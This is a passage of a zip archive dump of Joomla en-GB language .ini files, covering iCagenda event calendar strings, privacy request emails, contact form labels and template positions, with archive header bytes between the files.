COM_ICAGENDA_DATES_HELP_EXAMPLE1="eg a concert that starts at 20:00 and takes place only the selected day."
COM_ICAGENDA_DATES_HELP_LINE2="Event with several dates, consecutive or otherwise, with a start time, which may be different for each date."
COM_ICAGENDA_DATES_HELP_EXAMPLE2="eg a concert that would take place a week on Friday and Saturday, and the following week on Friday. This concert can started at different times, and you can add new dates at any time."
COM_ICAGENDA_DATES_HELP_LINE3="Event over a period (from ... to ...)."
COM_ICAGENDA_DATES_HELP_EXAMPLE3="eg a music festival which starts on Thursday at 14:00 and ends on Sunday at 23:00. In this case, you enter the start date and end date."
COM_ICAGENDA_DATES_HELP_LINE4="The event takes place over a period and you want to add specific hours."
COM_ICAGENDA_DATES_HELP_EXAMPLE4="eg A band participates in a music festival from Thursday 14:00 to Sunday 23:00. On Thursday, the band plays at 16:30, Saturday at 18:00 and Sunday at 13:15. You can then enter the period of the event (from Thursday 14:00 to Sunday 23:00) and add the single dates with time, when the band is on stage."
COM_ICAGENDA_DATES_HELP_LINE5="The event takes place over a period, and other dates that are not in this period."
COM_ICAGENDA_DATES_HELP_EXAMPLE5="eg an event which takes place from Monday to Sunday (dates over a period) and another week on Tuesday and Friday (single dates)."
;
COM_ICAGENDA_LEGEND_PERIOD_DATES="Event over a Period"
COM_ICAGENDA_FORM_LBL_EVENTPERIOD_START="Start Date"
COM_ICAGENDA_FORM_DESC_EVENTPERIOD_START="Date and time of beginning of event"
COM_ICAGENDA_FORM_LBL_EVENTPERIOD_END="End Date"
COM_ICAGENDA_FORM_DESC_EVENTPERIOD_END="Date and time of end of event"
COM_ICAGENDA_FORM_LBL_WEEK_DAYS="Week Days"
COM_ICAGENDA_FORM_WEEK_DAYS_INFO_TITLE="Selection of Week Days"
COM_ICAGENDA_FORM_WEEK_DAYS_INFO_DESC="You can split the period into single dates by selecting the days of the week.<br />If left empty, the period will not be divided, and will be considered as a full period (from ... to ... ).<br /><small>You can use Ctrl-click (Windows) or Cmd-click (Mac) to select more than one item.</small>"
COM_ICAGENDA_FORM_ALL_WEEK_DAYS="All the days of the week"
;
COM_ICAGENDA_LEGEND_SINGLE_DATES="Single Dates"
COM_ICAGENDA_FORM_LBL_EVENT_DATES="Date"
COM_ICAGENDA_FORM_DESC_EVENT_DATES="Select the dates of the event"
COM_ICAGENDA_ADD_DATE="Add"
COM_ICAGENDA_DELETE_DATE="Delete"
COM_ICAGENDA_TB_DATE="Date"
COM_ICAGENDA_TB_ACT="Actions"
COM_ICAGENDA_FORM_LBL_EVENT_NEXT="Closest date"
COM_ICAGENDA_FORM_DESC_EVENT_NEXT="Indicates the date of the event closest"
;
COM_ICAGENDA_DISPLAY_TIME_LABEL="Time Display"
COM_ICAGENDA_DISPLAY_TIME_DESC="Show or Hide Time of the event"
;
; Panel Information
COM_ICAGENDA_LEGEND_INFORMATION="Information"
;
; Panel Venue
COM_ICAGENDA_LEGEND_VENUE="Venue for the event"
COM_ICAGENDA_FORM_LBL_EVENT_VENUE="Venue"
COM_ICAGENDA_FORM_DESC_EVENT_VENUE="the place where event happens (MoMA, Eiffel Tower, European Stadium, London Concert Hall, Your Home, School, University, Building...)"
;
COM_ICAGENDA_LEGEND_PLACE="Place of the event"
COM_ICAGENDA_FORM_LBL_EVENT_PLACE="Name"
COM_ICAGENDA_FORM_DESC_EVENT_PLACE="Name of the place where the event will take place (MoMA, Eiffel Tower, European Stadium, London Concert Hall, ...)"
COM_ICAGENDA_FORM_LBL_EVENT_CITY="City"
COM_ICAGENDA_FORM_DESC_EVENT_CITY="The city where the event takes place"
COM_ICAGENDA_FORM_LBL_EVENT_COUNTRY="Country"
COM_ICAGENDA_FORM_DESC_EVENT_COUNTRY="The country where the event takes place"
;
COM_ICAGENDA_LEGEND_CONTACT="Contact Details"
COM_ICAGENDA_FORM_LBL_EVENT_EMAIL="Email"
COM_ICAGENDA_FORM_DESC_EVENT_EMAIL="Contact's Email"
COM_ICAGENDA_FORM_LBL_EVENT_PHONE="Telephone"
COM_ICAGENDA_FORM_DESC_EVENT_PHONE="Contact's Telephone"
COM_ICAGENDA_FORM_LBL_EVENT_WEBSITE="Website"
COM_ICAGENDA_FORM_DESC_EVENT_WEBSITE="Event's Website"
;
; Custom Fields
COM_ICAGENDA_LEGEND_OTHER_INFORMATION="Other Information"
;
; Panel Description
COM_ICAGENDA_LEGEND_DESC="Description"
COM_ICAGENDA_SUBMIT_AN_EVENT_SHORT_DESCRIPTION_LBL="Short Description"
COM_ICAGENDA_SUBMIT_AN_EVENT_SHORT_DESCRIPTION_DESC="Please enter a short description for this event."
COM_ICAGENDA_MAXIMUM_N_CHARACTERS="Maximum %s characters"
COM_ICAGENDA_N_REMAINING="(%s remaining)"
COM_ICAGENDA_FORM_LBL_EVENT_DESC="Description"
COM_ICAGENDA_SUBMIT_AN_EVENT_DESCRIPTION_DESC="Please enter a description for this event."
COM_ICAGENDA_FORM_EVENT_METADESC_LBL="Meta Description"
COM_ICAGENDA_SUBMIT_AN_EVENT_METADESC_DESC="An optional paragraph to be used as the description of the event page in the HTML output. This will generally display in the results of search engines."
COM_ICAGENDA_ALERT_TEXT_EXCEEDS_CHARACTER_LIMIT="Text exceeds the character limit.\n\nPlease edit it so that it is not truncated, and it fits within the maximum character limit."
;
; Panel Options
COM_ICAGENDA_REGISTRATION_OPTIONS="Registration options"
COM_ICAGENDA_REGISTRATION_LABEL="Registration"
COM_ICAGENDA_REGISTRATION_DESC="Enable registration for this event"
COM_ICAGENDA_TYPE_REG_LABEL="Registration Type"
COM_ICAGENDA_TYPE_REG_DESC="Select the type for registration : by date (displays a select list of dates), or for all dates of the event."
COM_ICAGENDA_REG_BY_INDIVIDUAL_DATE="by date"
COM_ICAGENDA_REG_FOR_ALL_DATES="for all dates"
COM_ICAGENDA_MAX_REGISTRATIONS_LABEL="Nb of tickets"
COM_ICAGENDA_MAX_REGISTRATIONS_DESC="Number of tickets available per date.<br />If <strong>Registration Type</strong> option is set to 'for all dates', the number of tickets will be set to the whole event, and not per date."
COM_ICAGENDA_MAX_PER_REGISTRATION_LABEL="Max. Nb per registration"
COM_ICAGENDA_MAX_PER_REGISTRATION_DESC="Maximum number of tickets available during one registration"
;
; Google Maps
COM_ICAGENDA_LEGEND_GOOGLE_MAPS="Google Maps"
COM_ICAGENDA_GOOGLE_MAPS_SUBTITLE_LBL="Address picker, with instant display selection on map."
COM_ICAGENDA_GOOGLE_MAPS_NOTE1="The map displays selected address, even while you navigate in autocomplete suggestions."
COM_ICAGENDA_GOOGLE_MAPS_NOTE2="You can even adjust marker position on the map."
COM_ICAGENDA_GOOGLE_MAPS_ADDRESS_LBL="Address"
COM_ICAGENDA_GOOGLE_MAPS_LATITUDE_LBL="Latitude"
COM_ICAGENDA_GOOGLE_MAPS_LONGITUDE_LBL="Longitude"
COM_ICAGENDA_GOOGLE_MAPS_REVERSE="Reverse Address after Marker Drag?"
COM_ICAGENDA_GOOGLE_MAPS_LEGEND="You can drag and drop the marker to the correct location"
COM_ICAGENDA_FORM_LBL_EVENT_LOCATION="Enter location to view map"
COM_ICAGENDA_FORM_DESC_EVENT_LOCATION="Enter location to view map: full address, street number, city, state, ..."
COM_ICAGENDA_FORM_LBL_EVENT_MAP="<i>Geographic Location</i>"
COM_ICAGENDA_FORM_DESC_EVENT_MAP="Location on Google Maps where the event takes place (move the cursor over the map to adjust automatically)"
COM_ICAGENDA_FORM_LBL_EVENT_GPS="<i>GPS</i>"
COM_ICAGENDA_MAPS_SERVICE_NOT_AVAILABLE="The Maps Service is not available."
COM_ICAGENDA_MAPS_FILL_IN_ADDRESS_ALERT="Please fill in the address field first."

;
; Warning Messages Box
COM_ICAGENDA_FORM_ALERT_UNPUBLISHED="Your event will not be published: no valid date for this event"
COM_ICAGENDA_FORM_ERROR_NO_STARTDATE="Error: You have specified an end date, but no start date for your event"
COM_ICAGENDA_FORM_ERROR_NO_ENDDATE="Error: You have specified a start date but no end date for your event"
COM_ICAGENDA_FORM_NO_DATES_ALERT="Please fill in the dates of the event."
IC_AUTH_REQUIRED="Authentication required"
COM_ICAGENDA_LOGIN_TO_ACCESS_REGISTRATION_FORM="Please login first to access registration form."
COM_ICAGENDA_LOGIN_TO_ACCESS_REGISTRATION_CANCELLATION="Please login first to access registration cancellation."
COM_ICAGENDA_FORM_ERROR_INVALID_FIELD="Invalid Field: %s"
COM_ICAGENDA_FORM_WARNING="Warning: %s"
COM_ICAGENDA_FORM_ERROR="Error: %s"
COM_ICAGENDA_FORM_ERROR_NO_DATES="Please fill in the date(s) of the event."
COM_ICAGENDA_FORM_ERROR_INCORRECT_CAPTCHA_SOL="The CAPTCHA solution was incorrect."
;
; Event Submission
COM_ICAGENDA_EVENT_SUBMISSION="Event Submission"
COM_ICAGENDA_EVENT_SUBMISSION_SUBMIT_NEW_EVENT="Submit a New Event"
COM_ICAGENDA_EVENT_SUBMISSION_ACCESS="You must be logged-in to submit an event!"
COM_ICAGENDA_EVENT_SUBMISSION_NO_RIGHTS="You are not authorised to submit an event."
COM_ICAGENDA_EVENT_FORM_SUBMIT="Submit Your Event"
COM_ICAGENDA_EVENT_SUBMISSION_CONFIRMATION="Your event has been submitted!"
COM_ICAGENDA_EVENT_SUBMISSION_THANK_YOU="Thank you for submitting your event to %s!"
COM_ICAGENDA_EVENT_SUBMISSION_ANY_QUESTIONS="Also, feel free to submit events and any questions you may have to %s at any time."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_BY_EDITOR="You will receive a message that your event has been submitted for review by an editor."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_BY_EDITOR_APPROVED="Your event will not appear on the calendar until it has been approved."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_BY_EDITOR_TIME="You can expect most of your submitted events to be processed within %s hours."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_STAFF="Staff will review your submission and will be in touch with you soon."
COM_ICAGENDA_EVENT_SUBMISSION_EDITOR_REVIEW="An editor will review your submission before validating it."
COM_ICAGENDA_EVENT_SUBMISSION_CONFIRMATION_EMAIL="You will receive a confirmation email when your event will be approved, with a direct link to view it."
COM_ICAGENDA_EVENT_SUBMISSION_VALIDATION_CONTACT="If you do not hear from us contact %s at %s."
COM_ICAGENDA_USER_EMAIL_HELLO="Hello %s"
COM_ICAGENDA_USER_EMAIL_BEST_REGARDS="Best regards,<br /> [SITENAME]"
COM_ICAGENDA_USER_EMAIL_EVENT_REFERENCE_NUMBER="Your Event Reference Number: %s"
COM_ICAGENDA_USER_EMAIL_EVENT_TITLE_AND_REF_NO="Your event '%s' has been submitted with reference number '%s'."
;
; Approved Notification Email
COM_ICAGENDA_APPROVED_USEREMAIL_SUBJECT="Your event %s is approved"
COM_ICAGENDA_APPROVED_USEREMAIL_BODY_INTRO="You're receiving this email because you have submitted an event at %s, which has been approved."
COM_ICAGENDA_APPROVED_USEREMAIL_EVENT_LINK="You can view your event at: %s"
COM_ICAGENDA_APPROVED_USEREMAIL_EVENT_LINK_INFO="If the URL is not a link, simply copy & paste it to your browser."
;
; Event Submission Notification Emails
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_SUBJECT="%s submitted a new event on %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_HELLO="Hello %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_NEW_EVENT="A new event has been submitted!"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_PREVIEW="Preview"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_APPROVE_INFO="To approve this event on %s please click the following link. If the URL is not a link, simply copy & paste it to your browser."
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_APPROVE_LINK="Approve link"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_SITE_MENUID="This event was submitted via frontend menu item ([ID] Title): [%s] %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_USER_INFO="Created by: %s, %s"
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_FOOTER="You have received this email from iCagenda running on the website %s because you belong to a user group allowed to approve events submitted. By clicking on the links above, you will automatically be logged-in. If you don't want to appear as logged-in user, don't click on those links."
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_FOOTER_NO_AUTOLOGIN="You have received this email from iCagenda running on the website %s because you belong to a user group allowed to approve events submitted."
COM_ICAGENDA_SUBMISSION_ADMIN_EMAIL_APPROVED_REVIEW="To view your event, click on the following link:"


; Traductions dates.js
SA="Sa"
SU="Su"
MO="Mo"
TU="Tu"
WE="We"
TH="Th"
FR="Fr"

; Traductions textes timepiker.js
COM_ICAGENDA_TP_CURRENT="Now"
COM_ICAGENDA_TP_CLOSE="Validate"
COM_ICAGENDA_TP_TITLE="Select the time"
COM_ICAGENDA_TP_TIME="Time"
COM_ICAGENDA_TP_HOUR="Hour"
COM_ICAGENDA_TP_MINUTE="Minute"

;
; DEPRECATED STRINGS
;

; DEPRECATED 3.6.0 - Removed 4.0.0
COM_ICAGENDA_REGISTRATION_COMPLETE="Your registration to event <i>%s</i> is complete."

; DEPRECATED 3.7.0 - Removed 4.0.0
COM_ICAGENDA_TERMS_AND_CONDITIONS_AGREE="Agree to Terms and Conditions."

PK!_� ZZ$en-GB/en-GB.mod_articles_popular.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_POPULAR="Articles - Most Read"
MOD_POPULAR_FIELD_CATEGORY_DESC="Select Articles from a specific Category or a set of Categories. If no selection will show all categories as default."
MOD_POPULAR_FIELD_COUNT_DESC="The number of Articles to display (the default is 5)."
MOD_POPULAR_FIELD_COUNT_LABEL="Count"
MOD_POPULAR_FIELD_FEATURED_DESC="Show or hide Articles marked as Featured."
MOD_POPULAR_FIELD_FEATURED_LABEL="Featured Articles"
MOD_POPULAR_XML_DESCRIPTION="This module shows a list of the published Articles which have the highest number of page views."
MOD_POPULAR_FIELD_DATEFIELD_DESC="Select which date field you want the date filter to be applied to."
MOD_POPULAR_FIELD_DATEFIELD_LABEL="Date Field"
MOD_POPULAR_FIELD_DATEFILTERING_DESC="Select Date Filtering Type."
MOD_POPULAR_FIELD_DATEFILTERING_LABEL="Date Filtering"
MOD_POPULAR_FIELD_ENDDATE_DESC="If Date Range is selected above, please enter an End Date."
MOD_POPULAR_FIELD_ENDDATE_LABEL="End Date"
MOD_POPULAR_FIELD_STARTDATE_DESC="If Date Range is selected above, please enter a Starting Date."
MOD_POPULAR_FIELD_STARTDATE_LABEL="Start Date Range"
MOD_POPULAR_FIELD_RELATIVEDATE_DESC="If Relative Date is selected above, please enter a numeric day value. Results will be retrieved relative to the current date and the value you enter."
MOD_POPULAR_FIELD_RELATIVEDATE_LABEL="Relative Date"
MOD_POPULAR_OPTION_CREATED_VALUE="Created Date"
MOD_POPULAR_OPTION_DATERANGE_VALUE="Date Range"
MOD_POPULAR_OPTION_MODIFIED_VALUE="Modified Date"
MOD_POPULAR_OPTION_OFF_VALUE="Off"
MOD_POPULAR_OPTION_RELATIVEDAY_VALUE="Relative Date"
MOD_POPULAR_OPTION_STARTPUBLISHING_VALUE="Start Publishing Date"
PK!�.ǎdden-GB/en-GB.com_privacy.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_PRIVACY="Privacy"
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CONFIRMED_REQUEST_MESSAGE="User %1$s has confirmed their information request."
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CONFIRMED_REQUEST_SUBJECT="Information Request Confirmed By User"
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CREATED_REQUEST_MESSAGE="A new information request has been submitted by %1$s."
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CREATED_REQUEST_SUBJECT="Information Request Submitted"
COM_PRIVACY_CONFIRM_REMIND_SUCCEEDED="Your consent to this web site's Privacy Policy has been extended."
COM_PRIVACY_CONFIRM_REQUEST_FIELDSET_LABEL="An email has been sent to your email address. The email has a confirmation token, please confirm your email address again and paste the confirmation token in the field below to prove that you are the owner of the information being requested."
COM_PRIVACY_CONFIRM_REQUEST_SUCCEEDED="Your information request has been confirmed. We will process your request as soon as possible and the export will be sent to your email."
COM_PRIVACY_CREATE_REQUEST_SUCCEEDED="Your information request has been created. Before it can be processed, you must verify this request. An email has been sent to your address with additional instructions to complete this verification."
; You can use the following merge codes for all COM_PRIVACY_EMAIL strings:
; [SITENAME]  Site name, as set in Global Configuration.
; [URL]       URL of the site's frontend page.
; [TOKENURL]  URL of the confirm page with the token prefilled.
; [FORMURL]   URL of the confirm page where the user can paste their token.
; [TOKEN]     The confirmation token.
; \n          Newline character. Use it to start a new line in the email.
COM_PRIVACY_EMAIL_REQUEST_BODY_EXPORT_REQUEST="Someone has created a request to export all personal information related to this email address at [URL]. As a security measure, you must confirm that this is a valid request for your personal information from this website.\n\nIf this was a mistake, just ignore this email and nothing will happen.\n\nIn order to confirm this request, you can complete one of the following tasks:\n\n1. Visit the following URL: [TOKENURL]\n\n2. Copy your token from this email, visit the referenced URL, and paste your token into the form.\nURL: [FORMURL]\nToken: [TOKEN]\n\nPlease note that this token is only valid for 24 hours from the time this email was sent."
COM_PRIVACY_EMAIL_REQUEST_BODY_REMOVE_REQUEST="Someone has created a request to remove all personal information related to this email address at [URL]. As a security measure, you must confirm that this is a valid request for your personal information to be removed from this website.\n\nIf this was a mistake, just ignore this email and nothing will happen.\n\nIn order to confirm this request, you can complete one of the following tasks:\n\n1. Visit the following URL: [TOKENURL]\n\n2. Copy your token from this email, visit the referenced URL, and paste your token into the form.\nURL: [FORMURL]\nToken: [TOKEN]\n\nPlease note that this token is only valid for 24 hours from the time this email was sent."
COM_PRIVACY_EMAIL_REQUEST_SUBJECT_EXPORT_REQUEST="Information Request Created at [SITENAME]"
COM_PRIVACY_EMAIL_REQUEST_SUBJECT_REMOVE_REQUEST="Information Deletion Request Created at [SITENAME]"
COM_PRIVACY_ERROR_CANNOT_CREATE_REQUEST_WHEN_SENDMAIL_DISABLED="An information request can't be created when email support is disabled."
COM_PRIVACY_ERROR_CHECKING_FOR_EXISTING_REQUESTS="There was an error checking for existing information requests, please try submitting this request again."
COM_PRIVACY_ERROR_CONFIRM_TOKEN_EXPIRED="The confirmation token for your information request has expired. You will need to submit a new request."
COM_PRIVACY_ERROR_CONFIRMING_REMIND_FAILED="No expiration reminder was found."
COM_PRIVACY_ERROR_CONFIRMING_REQUEST="Error while confirming the information request."
COM_PRIVACY_ERROR_CONFIRMING_REQUEST_FAILED="Your information request confirmation failed. %s"
COM_PRIVACY_ERROR_CREATING_REQUEST="Error while creating the information request."
COM_PRIVACY_ERROR_CREATING_REQUEST_FAILED="Your information request could not be created. %s"
COM_PRIVACY_ERROR_NO_PENDING_REMIND="No expiration reminder has been sent yet."
COM_PRIVACY_ERROR_NO_PENDING_REQUESTS="There are no information requests for this email address requiring confirmation."
COM_PRIVACY_ERROR_NO_REMIND_REQUESTS="Please re-check the token"
COM_PRIVACY_ERROR_PENDING_REQUEST_OPEN="There is already an active information request for this email address and request type. Please contact the site owner for updates on this request."
COM_PRIVACY_ERROR_REMIND_REQUEST="An error occurred while processing your request."
COM_PRIVACY_ERROR_UNKNOWN_REQUEST_TYPE="Unknown information request type."
COM_PRIVACY_FIELD_CONFIRM_CONFIRM_TOKEN_DESC="Enter the confirmation token you received by email."
COM_PRIVACY_FIELD_CONFIRM_CONFIRM_TOKEN_LABEL="Confirmation Token"
COM_PRIVACY_FIELD_CONFIRM_EMAIL_DESC="Enter your email address."
COM_PRIVACY_FIELD_REMIND_CONFIRM_TOKEN_DESC="Enter the confirmation token you received by email."
COM_PRIVACY_FIELD_REMIND_CONFIRM_TOKEN_LABEL="Confirmation Token"
COM_PRIVACY_FIELD_REQUEST_TYPE_DESC="The type of information request."
COM_PRIVACY_FIELD_REQUEST_TYPE_LABEL="Request Type"
COM_PRIVACY_FIELD_STATUS_DESC="The status of the information request."
COM_PRIVACY_REMIND_REQUEST_FIELDSET_LABEL="Renew Privacy Consent"
COM_PRIVACY_REQUEST_TYPE_EXPORT="Export"
COM_PRIVACY_REQUEST_TYPE_REMOVE="Remove"
COM_PRIVACY_VIEW_CONFIRM_PAGE_TITLE="Confirm Information Request"
COM_PRIVACY_VIEW_REQUEST_PAGE_TITLE="Submit Information Request"
COM_PRIVACY_WARNING_CANNOT_CREATE_REQUEST_WHEN_SENDMAIL_DISABLED="We're sorry, you can't submit an information request at this time."
PK!e�5cc#en-GB/en-GB.mod_breadcrumbs.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_BREADCRUMBS="Breadcrumbs"
MOD_BREADCRUMBS_XML_DESCRIPTION="This module displays the Breadcrumbs."
MOD_BREADCRUMBS_LAYOUT_DEFAULT="Default"

PK!�$5̋�en-GB/en-GB.mod_wrapper.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_WRAPPER="Wrapper"
MOD_WRAPPER_NO_IFRAMES="No iframes"
MOD_WRAPPER_XML_DESCRIPTION="This module shows an iframe window to specified location."
MOD_WRAPPER_LAYOUT_DEFAULT="Default"

PK!�����en-GB/en-GB.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metafile version="3.9" client="site">
	<name>English (en-GB)</name>
	<version>3.9.22</version>
	<creationDate>October 2020</creationDate>
	<author>Joomla! Project</author>
	<authorEmail>admin@joomla.org</authorEmail>
	<authorUrl>www.joomla.org</authorUrl>
	<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.</copyright>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<description><![CDATA[en-GB site language]]></description>
	<metadata>
		<name>English (United Kingdom)</name>
		<nativeName>English (United Kingdom)</nativeName>
		<tag>en-GB</tag>
		<rtl>0</rtl>
		<locale>en_GB.utf8, en_GB.UTF-8, en_GB, eng_GB, en, english, english-uk, uk, gbr, britain, england, great britain, uk, united kingdom, united-kingdom</locale>
		<firstDay>0</firstDay>
		<weekEnd>0,6</weekEnd>
		<calendar>gregorian</calendar>
	</metadata>
	<params />
</metafile>
PK!��v{{en-GB/en-GB.lib_gantry5.sys.ininu�[���LIB_GANTRY5="Gantry 5 Framework"
LIB_GANTRY5_DESCRIPTION="Gantry 5 Framework libraries. Needs to be enabled at all times."
PK!A��'en-GB/en-GB.mod_articles_categories.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_CATEGORIES="Articles - Categories"
MOD_ARTICLES_CATEGORIES_FIELD_COUNT_DESC="Select the number of first level subcategories to display. Default is all."
MOD_ARTICLES_CATEGORIES_FIELD_COUNT_LABEL="# First Subcategories"
MOD_ARTICLES_CATEGORIES_FIELD_MAXLEVEL_DESC="Select the maximum level depth for each subcategory. Default is all."
MOD_ARTICLES_CATEGORIES_FIELD_MAXLEVEL_LABEL="Maximum Level Depth"
MOD_ARTICLES_CATEGORIES_FIELD_PARENT_DESC="Choose a parent category."
MOD_ARTICLES_CATEGORIES_FIELD_PARENT_LABEL="Parent Category"
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_CHILDREN_DESC="Show or hide subcategories."
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_CHILDREN_LABEL="Show Subcategories"
MOD_ARTICLES_CATEGORIES_FIELD_NUMITEMS_DESC="Show or hide number of articles."
MOD_ARTICLES_CATEGORIES_FIELD_NUMITEMS_LABEL="Show Number of Articles"
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_DESCRIPTION_DESC="Show or hide category descriptions."
MOD_ARTICLES_CATEGORIES_FIELD_SHOW_DESCRIPTION_LABEL="Category Descriptions"
MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION="This module displays a list of categories from one parent category."
MOD_ARTICLES_CATEGORIES_TITLE_HEADING_LABEL="Heading Style"
MOD_ARTICLES_CATEGORIES_TITLE_HEADING_DESC="Set the heading style to use."PK!-�����en-GB/en-GB.com_contact.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_CONTACT_ADDRESS="Address"
COM_CONTACT_ARTICLES_HEADING="Contact's articles"
COM_CONTACT_CAPTCHA_LABEL="Captcha"
COM_CONTACT_CAPTCHA_DESC="Please complete the security check."
COM_CONTACT_CAT_NUM="# of Contacts :"
COM_CONTACT_CONTACT_DEFAULT_LABEL="Send an Email"
COM_CONTACT_CONTACT_EMAIL_A_COPY_DESC="Sends a copy of the message to the address you have supplied."
COM_CONTACT_CONTACT_EMAIL_A_COPY_LABEL="Send a copy to yourself"
COM_CONTACT_CONTACT_EMAIL_NAME_DESC="Your name."
COM_CONTACT_CONTACT_EMAIL_NAME_LABEL="Name"
COM_CONTACT_CONTACT_ENTER_MESSAGE_DESC="Enter your message here."
COM_CONTACT_CONTACT_ENTER_MESSAGE_LABEL="Message"
COM_CONTACT_CONTACT_ENTER_VALID_EMAIL="Please enter a valid email address."
COM_CONTACT_CONTACT_REQUIRED="<strong class="_QQ_"red"_QQ_">*</strong> Required field"
COM_CONTACT_CONTENT_TYPE_CONTACT="Contact"
COM_CONTACT_CONTENT_TYPE_CATEGORY="Contact Category"
COM_CONTACT_FILTER_LABEL="Filter Field"
COM_CONTACT_FILTER_SEARCH_DESC="Contact Filter Search"
COM_CONTACT_CONTACT_MESSAGE_SUBJECT_DESC="Enter the subject of your message here."
COM_CONTACT_CONTACT_MESSAGE_SUBJECT_LABEL="Subject"
COM_CONTACT_CONTACT_SEND="Send Email"
COM_CONTACT_COPYSUBJECT_OF="Copy of: %s"
COM_CONTACT_COPYTEXT_OF="This is a copy of the following message you sent to %s via %s"
COM_CONTACT_COUNT="Contact count:"
COM_CONTACT_COUNTRY="Country"
COM_CONTACT_DEFAULT_PAGE_TITLE="Contacts"
COM_CONTACT_DETAILS="Contact"
COM_CONTACT_DOWNLOAD_INFORMATION_AS="Download information as:"
; The following string is deprecated and will be removed in 4.0
COM_CONTACT_EMAIL_BANNEDTEXT="The %s of your email has banned text."
COM_CONTACT_EMAIL_DESC="Email Address for contact."
COM_CONTACT_EMAIL_FORM="Contact Form"
COM_CONTACT_EMAIL_LABEL="Email"
COM_CONTACT_EMAIL_THANKS="Thank you for your email."
COM_CONTACT_ENQUIRY_TEXT="This is an enquiry email via %s from:"
COM_CONTACT_ERROR_CONTACT_NOT_FOUND="Contact not found"
COM_CONTACT_FAX="Fax"
COM_CONTACT_FAX_NUMBER="Fax: %s"
COM_CONTACT_FORM_LABEL="Send an Email. All fields with an asterisk (*) are required."
COM_CONTACT_FORM_NC="Please make sure the form is complete and valid."
COM_CONTACT_IMAGE_DETAILS="Contact image"
COM_CONTACT_LINKS="Links"
COM_CONTACT_MAILENQUIRY="%s Enquiry"
COM_CONTACT_MOBILE="Mobile"
COM_CONTACT_MOBILE_NUMBER="Mobile: %s"
COM_CONTACT_NO_CONTACTS="There are no Contacts to display"
COM_CONTACT_NOT_MORE_THAN_ONE_EMAIL_ADDRESS="You can't enter more than one email address."
COM_CONTACT_NUM_ITEMS="Contact Count:"
COM_CONTACT_OPTIONAL="(optional)"
COM_CONTACT_OTHER_INFORMATION="Miscellaneous Information"
COM_CONTACT_POSITION="Position"
COM_CONTACT_PROFILE="Profile"
COM_CONTACT_PROFILE_HEADING="Contact profile"
COM_CONTACT_SELECT_CONTACT="Select a contact:"
COM_CONTACT_SESSION_INVALID="Invalid session cookie. Please check that you have cookies enabled in your web browser."
COM_CONTACT_STATE="State"
COM_CONTACT_SUBURB="Suburb"
COM_CONTACT_TELEPHONE="Phone"
COM_CONTACT_TELEPHONE_NUMBER="Phone: %s"
COM_CONTACT_USER_FIELDS="Fields"
COM_CONTACT_VCARD="vCard"
PK!����!en-GB/en-GB.tpl_protostar.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_PROTOSTAR_POSITION_BANNER="Banner"
TPL_PROTOSTAR_POSITION_DEBUG="Debug"
TPL_PROTOSTAR_POSITION_POSITION-0="Search"
TPL_PROTOSTAR_POSITION_POSITION-10="Unused"
TPL_PROTOSTAR_POSITION_POSITION-11="Unused"
TPL_PROTOSTAR_POSITION_POSITION-12="Unused"
TPL_PROTOSTAR_POSITION_POSITION-13="Unused"
TPL_PROTOSTAR_POSITION_POSITION-14="Unused"
TPL_PROTOSTAR_POSITION_POSITION-15="Unused"
TPL_PROTOSTAR_POSITION_POSITION-1="Navigation"
TPL_PROTOSTAR_POSITION_POSITION-2="Breadcrumbs"
TPL_PROTOSTAR_POSITION_POSITION-3="Top centre"
TPL_PROTOSTAR_POSITION_POSITION-4="Unused"
TPL_PROTOSTAR_POSITION_POSITION-5="Unused"
TPL_PROTOSTAR_POSITION_POSITION-6="Unused"
TPL_PROTOSTAR_POSITION_POSITION-7="Right"
TPL_PROTOSTAR_POSITION_POSITION-8="Left"
TPL_PROTOSTAR_POSITION_POSITION-9="Unused"
TPL_PROTOSTAR_POSITION_FOOTER="Footer"
